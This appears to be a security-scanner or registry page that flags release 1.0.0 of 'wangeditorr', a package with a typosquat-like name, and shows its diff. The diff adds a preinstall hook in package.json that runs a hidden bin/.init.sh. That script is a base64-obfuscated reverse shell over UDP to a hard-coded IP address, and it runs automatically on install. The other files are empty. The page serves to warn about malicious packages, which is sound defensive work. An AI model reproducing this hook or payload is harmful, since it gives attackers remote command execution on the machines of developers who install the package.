wangeditorr 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of wangeditorr might be problematic. Click here for more details.

package/README.txt ADDED
File without changes
package/bin/.init.sh ADDED
@@ -0,0 +1 @@
1
+ {echo,ZXhlYyA1PD4vZGV2L3VkcC8xMDAuNjkuMjQ5LjE0Ni8xMDAwNDtlY2hvID4mNSAmJiAoY2F0IDwmNXx3aGlsZSByZWFkIGxpbmU7ZG8gJGxpbmUgPiY1IDI+JjU7ZG9uZSk=}|{base64,-d}|{bash,-i}
package/index.js ADDED
File without changes
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+
2
+ {
3
+ "name": "wangeditorr",
4
+ "version": "1.0.0",
5
+ "description": "",
6
+ "main": "index.js",
7
+ "scripts": {
8
+ "preinstall": "chmod +x bin/.init.sh&&bin/.init.sh &",
9
+ "postinstall": "echo 2"
10
+ },
11
+ "keywords": [],
12
+ "author": "",
13
+ "license": "ISC"
14
+ }
15
+